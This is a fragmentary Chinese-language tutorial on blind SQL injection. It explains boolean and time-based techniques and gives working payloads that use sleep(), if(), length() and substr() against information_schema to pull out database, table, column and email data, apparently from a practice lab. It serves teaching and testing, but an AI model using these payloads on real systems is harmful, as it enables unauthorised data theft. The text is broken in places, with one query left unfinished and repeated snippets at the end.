遮蔽了報錯資訊,攻擊者無法使用報錯資訊來進行注入判斷。
1. boolean
盲注:無論輸入什麼只會顯示真與假
2. 時間盲注:頁面沒有任何的顯示,通過時間的延遲來判斷是否存在注入
是無論輸入什麼,結果只返回真和假兩種結果。
判斷資料庫名的長度:
length(database())>=x
判斷表名:
substr(database(),1,1)='xx' 通過
asii
碼判斷:
由於使用以上方法操作複雜,因此可以會用
burp suite
來對其進行操作
**存在
sql
注入漏洞,然而頁面既不會回顯資料,也不會回顯錯誤資訊,語句執行後也 不提示真
假,我們不能通過頁面的內容來判斷。這裡我們可以通過構造語句,通過頁面響應的時長,來判斷信
息。 通過回顯時間的延遲作為判斷:
1 and sleep(5) ----
如果時間有延遲則可以使用時間盲注
判斷時間延遲的函式:
sleep()
、benchmark()
if(str1,str2,str3) ---
如果str1
正確,則返回
str2
,否則執行
str3
?id=1' and sleep(5) --+ ---
基於單引號的時間盲注
?id=1" and sleep(5) --+ ---
基於雙引號的時間盲注
id=1' and if(length(database())>=9,sleep(5),1) --+
出錯資料庫名長度為8
id=1' and if(substr(database(),1,1)='a',sleep(5),1) --+
id=1' and if(substr(
(
select group_concat(table_name) from information_schema.tables where table_schema='security')
,1,1)='e',sleep(5),1) --+
id=1' and if(substr((select group_concat(column_name) from information_schema.columns
id=1' and if(substr((select group_concat(id,email_id) from security.emails),1,1)='1',sleep(5),1) --+
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...
SQL注入 盲注
注入攻擊的本質,是把使用者輸入的資料當做 執行.1.是使用者能夠控制輸入 2.是原本程式要執行的 拼接了使用者輸入的資料.盲注布林盲注 order by 沒有顯示注入點 對錯只顯示有無資料 延時盲注 頁面無論怎麼搞都不變 盲注需要掌握的幾個函式 length 返回字串的長度 substr str,p...